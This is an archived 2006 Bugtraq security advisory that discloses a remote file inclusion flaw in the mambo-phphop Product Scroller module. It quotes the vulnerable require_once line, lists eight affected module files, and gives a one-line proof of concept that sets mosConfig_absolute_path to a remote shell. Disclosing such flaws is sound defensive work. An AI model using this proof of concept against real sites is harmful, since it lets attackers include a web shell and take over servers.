[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20060818042906.22851.qmail@securityfocus.com>
Date: 18 Aug 2006 04:29:06 -0000
From: Outlaw@...a-security.net
To: bugtraq@...urityfocus.com
Subject: mambo-phphop Product Scroller Module R.F.I
###########################################################################################
# Aria-Security.net Advisory #
# Discovered by: O.U.T.L.A.W #
# < www.Aria-security.net > #
# Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp #
# #
###########################################################################################
#Software: mambo-phphop Product Scroller Module
#Attack method: Remote File Inclusion
#Source:
/* Load the phpshop main parse code */
require_once( $mosConfig_absolute_path.'/components/com_phpshop/phpshop_parser.php' );
************************************************************************************
#Vulnarable Files:
mod_phpshop.php
mod_phpshop_allinone.php
mod_phpshop_cart.php
mod_phpshop_featureprod.php
mod_phpshop_latestprod.php
mod_product_categories.php
mod_productscroller.php
mosproductsnap.php
#Proof of Concept:
#one of the files above.php?mosConfig_absolute_path=SHELL
#
#----------------------------------------------------------
#
#
#Contact : Outlaw@...a-security.net
Powered by blists - more mailing lists